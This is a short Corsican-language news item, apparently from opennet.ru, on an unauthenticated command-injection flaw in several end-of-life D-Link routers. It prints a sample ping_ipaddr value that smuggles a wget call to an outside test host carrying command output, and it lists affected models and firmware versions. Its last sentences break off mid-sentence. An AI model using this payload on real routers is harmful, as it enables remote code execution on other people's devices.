In i router wireless D-Link
Curiosamente, sicondu i sviluppatori di firmware, a chjama "ping_test" deve esse eseguita solu dopu l'autentificazione, ma in realtà hè chjamata in ogni casu, indipendentemente da u logu in l'interfaccia web. In particulare, quandu accede à l'script apply_sec.cgi è passendu u paràmetru "action=ping_test", l'script redirige à a pagina di autentificazione, ma à u stessu tempu eseguisce l'azzione assuciata à ping_test. Per eseguisce u codice, una altra vulnerabilità hè stata aduprata in ping_test stessu, chì chjama l'utilità ping senza cuntrollà bè a correttezza di l'indirizzu IP mandatu per a prova. Per esempiu, per chjamà l'utilità wget è trasfiriri i risultati di u cumandimu "echo 1234" à un host esternu, basta à specificà u paràmetru "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://". test.test/?$( echo 1234)".
A prisenza di a vulnerabilità hè stata cunfirmata ufficialmente in i seguenti mudelli:
- DIR-655 cù firmware 3.02b05 o più vechju;
- DIR-866L cù firmware 1.03b04 o più vechju;
- DIR-1565 cù firmware 1.01 o più vechju;
- DIR-652 (nessuna infurmazione nantu à e versioni problematiche di firmware hè furnita)
U periodu di supportu per questi mudelli hè digià scadutu, cusì D-Link
Hè statu dopu scupertu chì a vulnerabilità era ancu
Source: opennet.ru